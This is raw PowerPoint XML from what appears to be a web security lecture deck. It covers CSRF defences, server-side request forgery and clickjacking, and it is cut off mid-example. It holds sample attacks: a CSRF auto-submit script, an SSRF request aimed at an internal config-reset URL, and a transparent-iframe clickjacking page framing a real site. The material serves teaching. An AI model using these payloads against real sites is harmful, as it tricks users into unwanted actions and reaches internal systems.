              </a:rPr>
              <a:t>&lt;script&gt;document.forms[0].submit()&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> header value to make sure that the request comes from a legitimate page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> property of cookies, which prevent cookies from being sent if the request is originated by a different site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424750373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CSRF Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best: Insert a secret value every time a form is served and check the secret value on submission:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;form action=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>transfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>” method=POST&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input type=“text” name=“amount” /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input type=“text” name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” secret=“16255300019299111”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input type=“submit” value=“Transfer money” /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146280381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3BE0-2277-752F-CFEF-F55164BE69AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-Side Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C3FEAC5-CAF2-FCDD-630A-F847BFC88317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSRF vulnerabilities are caused by the use of user-provided information in performing requests on the server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be used to contact localhost (the server) or an internal system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST /process/login HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bar&amp;avatar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>avatar.com?foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST /process/login HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bar&amp;avatar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= http://192.168.0.68/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>config?reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382603630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408458-4937-6044-CF12-777273BC4847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="SSRF Common Flow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{732D83B4-FC07-53FE-7B4F-E91B04A5F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218" y="1063229"/>
            <a:ext cx="4823927" cy="39518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29AB3DA-4D05-4F71-FF3A-A281E414092E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7514067" y="3385134"/>
            <a:ext cx="3005951" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/OWASP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>CheatSheetSeries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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227845520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Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack a user is lured into clicking a button that is not associated with the page displayed by the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: clicking on harmless “Download free screensaver” button a on page on site A will actually become a click on “Remove security restrictions” on your bank web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attack, also called “UI redressing” is performed by using overlapping transparent frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stacking order: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-index: &lt;value&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transparency: opacity: &lt;value&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187401477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Clickjacking Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;head&gt;&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> Times&lt;/title&gt;&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> Example&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;div style="z-index:2; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>position:absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; top:0; left:0; width: 100%; height: 100%"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.facebook.com/home.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>?" id="frame1" style="opacity:0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>filter:alpha(opacity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=0);" width="100%" height="100%" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;/div&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;div align="right" style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>position:absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; top:0; left:0; z-index:1; width: 100%; height:100%; background-color: white; text-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>align:left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt;&lt;input type="submit" value="Achieve Nirvana" /&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> /&gt;Press this button to achieve happiness &lt;/</a:t>
            </a:r>
